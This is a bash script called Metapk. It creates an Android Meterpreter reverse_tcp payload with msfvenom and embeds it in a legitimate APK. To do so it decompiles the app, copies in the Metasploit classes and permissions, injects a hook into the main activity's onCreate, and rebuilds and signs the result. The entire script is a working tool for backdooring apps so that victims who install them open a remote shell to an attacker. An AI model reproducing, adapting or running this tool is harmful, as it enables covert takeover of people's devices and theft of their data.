#!/bin/bash
excode=0
declare -i counter=1
mode="auto"
if ! [ -d "$(pwd)/logs" ]; then
	mkdir "$(pwd)/logs"
fi
logfile="./logs/metapk-`date +%s`.log"

cleanup(){
	echo "+ Cleaning Up"
	for i in activity file smaliloc.tmp smalifiles; do
		[ ! -f $i ] || rm $i
	done
	rm -rf original/
	rm -rf payload/
	echo "+ Done"
}

manifest(){
	x=$(grep -n -w uses-permission original/AndroidManifest.xml)
        while [ $(wc -l <<<$x) != 1 ]; do
        x=$(sed '1d' <<<$x)
        done
        x=$(sed 's/:.*//' <<<$x)
        x=$(($x+1))
        cat payload/AndroidManifest.xml | grep uses-permission > manifest
        while read -r i || [[ -n $i ]]; do
                sed -i ''$x'i'"\    $i"'' original/AndroidManifest.xml
                x=$((x+1))
        done < manifest
        rm manifest
	embed
	sign
	xcode=$?
	if [ "$xcode" != "0" ]; then
		if [ "$hok" == "1" ]; then
		embed hook
		sign
	fi
	if [ "$xcode" != "0" ]; then
		if ! [ -z "$(grep -w v15 $logfile)" ]; then
		embed fallback
		sign
	fi
	fi	
fi
error_handler


}

error_handler(){
if [ "$excode" != "0" ]; then
		echo "> An Error Occured, See $logfile for details"
		cleanup
		exit 1
	fi
}

browse_smali(){
	for i in "$1"/*;
        do
     filename="${i##*/}"
     base="${filename%.[^.]*}"
     ext="${filename:${#base} + 1}"
        if [ -d $i ]; then
                browse_smali $i
        fi
        if [[ -z "$base" && -n "$ext" ]]; then
        base=".$ext"
        ext="nil"
    fi
        if [ "$ext" == "smali" ]; then
        	if [ "$mode" == "auto" ]; then
        		if [ "$fl" != "$i" ]; then
        	echo $counter. $filename >> smalifiles
        	counter+=1
        	fl=$i
        fi
        fi
        	if [ -z $x ]; then	        		
		exit 1
	fi
               smal=$(echo $i | grep -w $x.smali)
			if [ "$smal" != "" ]; then
				echo $smal > smaliloc.tmp
				actvt=$(cat $smal | grep "\->onCreate(Landroid\/os\/Bundle;)V")
				if [ -z "$actvt" ]; then
					cat $smal | grep Activity > activity
					read -r x < activity					
					x=$(sed 's/.*\///' <<< $x | sed 's/;.*//')										
					browse_smali original $x
					break
				else
					echo $smal
                                	break
				fi
			fi
        fi
done
}

embed(){
	hook=p0
	if [ "$1" == "" ]; then
	echo "+ Embedding Payload Into Original Apk"
	cat original/AndroidManifest.xml | grep \<activity > file
	read -r x < file
	rm file
	x=$(sed 's/.*name="//' <<<$x | sed 's/\".*//' | sed 's/.*\.//')	
	x=$(browse_smali original $x)
	fi

	if [ "$1" == "hook" ]; then
		if ! [ -f smaliloc.tmp ]; then
			echo "> Couldn't Locate Smali File, Choose Another APK"
			cleanup
			exit 1
		fi
		read -r y < smaliloc.tmp
		rm smaliloc.tmp
		x=$(cat $y | grep -w invoke | sed 's/.*\,//' | sed 's/\;.*//' | sed 's/L//').smali
		x=$(tr -d ' ' <<< $x)
		for i in */* ;
			do
				if [ -f $i/$x ]; then
					x=$i/$x
				fi
			done
fi
	if [ -z "$x" ]; then
		hok=1
		return 1
	fi
	#echo $(wc -l <<< $x)
	#read -r enterkey
	while [ "$(wc -l <<< $x)" != "1" ]
		do
			x=$(sed 1d <<< $x)
		done
	if [ "$mode" == "auto" ]; then
	while :
		do
	echo -n "++ Inject Hook Into $(echo $x | sed 's/.*\///')? (Y/n): "
	read -r opt
	opt=$(tr '[:upper:]' '[:lower:]' <<< $opt)	
	case $opt in 		
		n) mode="manual";manual_hook; return;;
		y) break;;
		*) echo "I Don't Think That's A Valid Option";;
esac
done
fi
	
	read -r x <<<$x
	if [ "$x" != "" ]; then
	msg="Injecting Hook Into Smali File"
		if [ "$1" == "fallback" ]; then
			hook=v0
			ln=$(grep -n -w metasploit $x | sed 's/:.*//')
			sed -i ''$ln'd' $x
			msg="Something Went Wrong, Re-Injecting Hook Into Smali File"
		fi
		echo "+ $msg"
        	 sed -i '/->onCreate(Landroid\/os\/Bundle;)V/a \    invoke-static {'$hook'}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V' $x
else echo "> Could Not Find Smali File To Inject Hook, See $logfile For Details"
	cleanup
	exit 1
        fi
}

manual_hook(){
	bat smalifiles
	echo -n "Choose Smali File To Inject Hook In ==> "
	read -r opt
	x=$(grep -w $opt smalifiles | sed 's/.*[[:space:]]//' | sed 's/\..*//')	
	x=$(browse_smali original $x)
	embed "manual"
}

sign(){
echo "+ Building Original Apk"
 ./bin/apktool b original/ >> $logfile 2>&1

	if [ "$?" != "0" ]; then
		excode=1
		return 1
	fi
echo "+ Signing Original Apk"
jarsigner -verbose -keystore ./bin/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA original/dist/*.apk androiddebugkey >>$logfile
	if ! [ -d $(pwd)/output ]; then
		mkdir $(pwd)/output
	fi
cp original/dist/*.apk output/
cleanup
}

cp_payload(){
	cp -r payload/smali/com/metasploit original/smali/com
	manifest
}

decompile(){
	echo "+ Decompiling Original Apk"
	./bin/apktool empty-framework-dir --force >> $logfile 2>&1
	./bin/apktool d -f -o original $1 >> $logfile 2>&1
	shift
	echo "+ Decompiling Payload"
	./bin/apktool d -f -o payload $1 >> $logfile 2>&1
	cp_payload
}

create(){
	msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=$1 lport=$2 -o backdoor.apk
}

if [ "$1" == "-e" -o "$1" == "--embed" ]; then
	shift
	decompile $@
elif [ "$1" == "--clean" ]; then
	cleanup
elif [ "$1" == "-c" -o "$1" == "create" ]; then
	shift
	create $@
else
printf "Metapk
Version: 1.0.0
Author:Dharmy
Usage: metapk
	-c, --create <lhost> <lport>                Creates A Payload With The specified lhost and lport
	-e, --embed <original apk> <payload>        Decompiles the original apk and payload, embeds the payload, builds the original apk back and signs it
	--clean                                     Cleans Up The Working Directory
"
fi
